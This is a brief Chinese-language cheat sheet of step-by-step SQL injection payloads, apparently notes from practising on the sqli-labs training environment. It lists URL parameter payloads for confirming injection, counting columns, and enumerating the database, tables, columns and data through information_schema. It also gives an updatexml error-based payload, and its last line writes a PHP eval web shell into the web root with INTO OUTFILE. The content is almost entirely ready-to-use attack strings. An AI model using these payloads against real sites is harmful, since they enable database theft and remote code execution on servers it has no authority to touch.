判断是否存在注入:?id=1' and 1=1 -- qwe

判断字段数:?id=1'order by 3-- qwe

判断显错位 :?id=10'union select 1,2,3 -- qwe

判断库名:?id=10'union select 1,database(),3 -- limit0,1 qwe

判断表名:?id=10'union select 1,table_name,3 from
information_schema.tables where table_schema='security' -- qwe

判断列名:?id=10'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails' -- qwe

判断数据:?id=10'union select 1,id,3 from emails-- qwe

updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
union select 1,"<?php eval($_REQUEST[8])?>",3 into outfile "D://phpstudy_pro//WWW//sqli-labs-master//Less-7//1.php"-- a